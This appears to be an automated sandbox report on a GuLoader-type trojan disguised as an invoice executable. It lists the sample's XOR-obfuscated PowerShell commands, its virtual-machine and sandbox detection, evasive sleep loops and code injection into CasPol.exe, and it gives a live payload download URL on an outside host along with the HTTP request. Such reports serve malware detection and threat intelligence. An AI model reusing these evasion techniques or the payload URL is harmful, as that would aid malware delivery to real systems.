Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}

Tries to detect Any.run

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE\FS
Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEXEQ&F
Source: INVOICE-98656789.exe, 00000000.00000002.3245584457.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488399305.0000000005E00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\INVOICE-98656789.exe TID: 9748	Thread sleep time: -43900s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1792	Thread sleep time: -270000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Last function: Thread delayed

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Window / User API: threadDelayed 439

Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_00405A0C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A0C
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004065DD FindFirstFileA,FindClose,	0_2_004065DD
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004027AF FindFirstFileA,	0_2_004027AF

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	API call chain: ExitProcess graph end node

Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exee\fs
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004345000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6486948852.0000000004382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 000000A7.00000002.6486948852.0000000004382000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: INVOICE-98656789.exe, 00000000.00000002.3245584457.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488399305.0000000005E00000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: INVOICE-98656789.exe, 00000000.00000002.3258704124.0000000006729000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: CasPol.exe, 000000A7.00000002.6488489505.0000000005E69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: INVOICE-98656789.exe, 00000000.00000002.3245662006.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exexeQ&f

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Code function: 0_2_70351B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70351B28

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe protection: read write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 990000			Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 617008			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72352E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30292272 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A412D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6561763A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x46696E3A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x41286F7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72342273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7838326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3030326F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x70203273 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2069226B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30783A6F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A5436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7274773E -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C416E33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F632A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C6B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3078316F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x30302E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x69203227 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x34302B2F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723372 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A513A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x74466B33 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6E74672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2869706C -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F772A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3734306B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x202C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302E36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2E723072 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x656C316D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3A3A503A -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x61644436 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6C652A36 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x72332E7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3539366B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x3131376D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x53686D28 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x7573672D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x33323865 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x57696C3B -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F77522D -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6F634377 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6972337F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C69226F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x2C206B7F -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x302C2236 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x20302B72 -bxor 607}	Jump to behavior
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe Invoke-Command -ScriptBlock{0x6B657031 -bxor 607}	Jump to behavior

Source: C:\Users\user\Desktop\INVOICE-98656789.exe

0_2_00403395

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
78.135.106.235	www.batimetalelk.com	Turkey		42910	PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR	true

Contacted Domains

Name	IP	Active
www.batimetalelk.com	78.135.106.235	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.batimetalelk.com/QjshjCZmm78.bin	true	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: INVOICE-98656789.exe	Virustotal: Detection: 25%			Perma Link
Source: INVOICE-98656789.exe	ReversingLabs: Detection: 18%

Uses 32bit PE files

Source: INVOICE-98656789.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: INVOICE-98656789.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_00405A0C GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A0C
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004065DD FindFirstFileA,FindClose,	0_2_004065DD
Source: C:\Users\user\Desktop\INVOICE-98656789.exe	Code function: 0_2_004027AF FindFirstFileA,	0_2_004027AF

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:49780 -> 78.135.106.235:80

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /QjshjCZmm78.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: www.batimetalelk.comCache-Control: no-cache
